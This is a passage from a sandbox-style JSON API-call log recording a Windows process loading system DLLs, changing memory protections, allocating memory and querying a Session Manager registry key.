"0x771a1164", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00w\\x00s\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00T\\x00E\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00w\\x00i\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00e\\x00s\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 510 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731cc000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 511 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73906000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 512 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73a53000" }, { "name": "ModuleName", "value": "ntmarta.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 513 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72e82000" }, { "name": "ModuleName", "value": "wintypes.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 514 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7300e000" }, { "name": "ModuleName", "value": "CoreUIComponents.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 515 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a131c", "parentcaller": "0x771a1164", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xd04o\\x004\\x0f\\x00\\x00\\x02\\x00\\x00\\x000\\xaaq\\x00\\xf8+\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\xaaq\\x00X\\x0b\\x00\\x00\\x02\\x00\\x00\\x00\\xd0\\xa9q\\x00\\$\\x00\\x00\\x02\\x00\\x00\\x00P\\xa8q\\x00p\\x17\\x00\\x00" } ], "repeated": 0, "id": 516 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 517 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 518 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 519 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x74f3a3c1", "parentcaller": "0x74f39792", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\SYSTEM32\\ntmarta.dll" } ], "repeated": 0, "id": 520 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x74f3a400", "parentcaller": "0x74f39792", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b0" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ntmarta.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 521 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 522 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\ntmarta" }, { "name": "DllBase", "value": "0x73a30000" } ], "repeated": 0, "id": 523 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 524 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 525 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 526 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a3c1", "parentcaller": "0x74f39792", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\System32\\CoreMessaging.dll" } ], "repeated": 0, "id": 527 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a400", "parentcaller": "0x74f39792", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b0" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\CoreMessaging.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 528 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 529 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\CoreMessaging" }, { "name": "DllBase", "value": "0x738a0000" } ], "repeated": 0, "id": 530 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 531 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 532 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 533 }, { "timestamp": "2025-02-27 23:34:15,925", "thread_id": "3892", "caller": "0x74f3a3c1", "parentcaller": "0x74f39792", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\SYSTEM32\\wintypes.dll" } ], "repeated": 0, "id": 534 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a400", "parentcaller": "0x74f39792", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\WinTypes.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 535 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 536 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wintypes" }, { "name": "DllBase", "value": "0x72dc0000" } ], "repeated": 0, "id": 537 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 538 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 539 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 540 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a3c1", "parentcaller": "0x74f39792", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\System32\\SHCORE.dll" } ], "repeated": 0, "id": 541 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a400", "parentcaller": "0x74f39792", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\SHCore.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 542 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 543 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\SHCORE" }, { "name": "DllBase", "value": "0x75bb0000" } ], "repeated": 0, "id": 544 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 545 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 546 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 547 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a3c1", "parentcaller": "0x74f39792", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\System32\\CoreUIComponents.dll" } ], "repeated": 0, "id": 548 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a400", "parentcaller": "0x74f39792", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\CoreUIComponents.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 549 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 550 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\CoreUIComponents" }, { "name": "DllBase", "value": "0x72ea0000" } ], "repeated": 0, "id": 551 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 552 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 553 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a209", "parentcaller": "0x74f39f7b", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 554 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a3c1", "parentcaller": "0x74f39792", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\SYSTEM32\\textinputframework.dll" } ], "repeated": 0, "id": 555 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a400", "parentcaller": "0x74f39792", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\textinputframework.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 556 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 557 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x74f3a4a1", "parentcaller": "0x74f39792", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\textinputframework" }, { "name": "DllBase", "value": "0x73120000" } ], "repeated": 0, "id": 558 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7719e012", "parentcaller": "0x771a1d43", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\ntmarta" }, { "name": "BaseAddress", "value": "0x73a30000" }, { "name": "InitRoutine", "value": "0x73a37e90" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 559 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7719e012", "parentcaller": "0x771a1d43", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\CoreMessaging" }, { "name": "BaseAddress", "value": "0x738a0000" }, { "name": "InitRoutine", "value": "0x739015e0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 560 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7719e012", "parentcaller": "0x771a1d43", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\WinTypes" }, { "name": "BaseAddress", "value": "0x72dc0000" }, { "name": "InitRoutine", "value": "0x72e390c0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 561 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7719e012", "parentcaller": "0x771a1d43", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\SHCore" }, { "name": "BaseAddress", "value": "0x75bb0000" }, { "name": "InitRoutine", "value": "0x75bf2170" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 562 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02273000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 563 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02275000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 564 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7718138f", "parentcaller": "0x7718110a", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002e4" }, { "name": "DesiredAccess", "value": "0x00000009", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" } ], "repeated": 0, "id": 565 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x771813ac", "parentcaller": "0x7718110a", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002e4" }, { "name": "ValueName", "value": "ResourcePolicies" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies" } ], "repeated": 0, "id": 566 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x771813c2", "parentcaller": "0x7718110a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002e4" } ], "repeated": 0, "id": 567 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7717f08b", "parentcaller": "0x7717ef80", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023e0000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 568 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7717f0d2", "parentcaller": "0x7717ef80", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023e0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 569 }, { "timestamp": "2025-02-27 23:34:15,941", "thread_id": "3892", "caller": "0x7717f0d2", "parentcaller": "0x7717ef80", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\CoreUIComponents" }, { "name": "BaseAddress", "value": "0x72ea0000" }, { "name": "InitRoutine", "value": "0x72efeba0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 570 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00738000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 571 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\TextInputFramework" }, { "name": "BaseAddress", "value": "0x73120000" }, { "name": "InitRoutine", "value": "0x731605d0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 572 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 573 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": 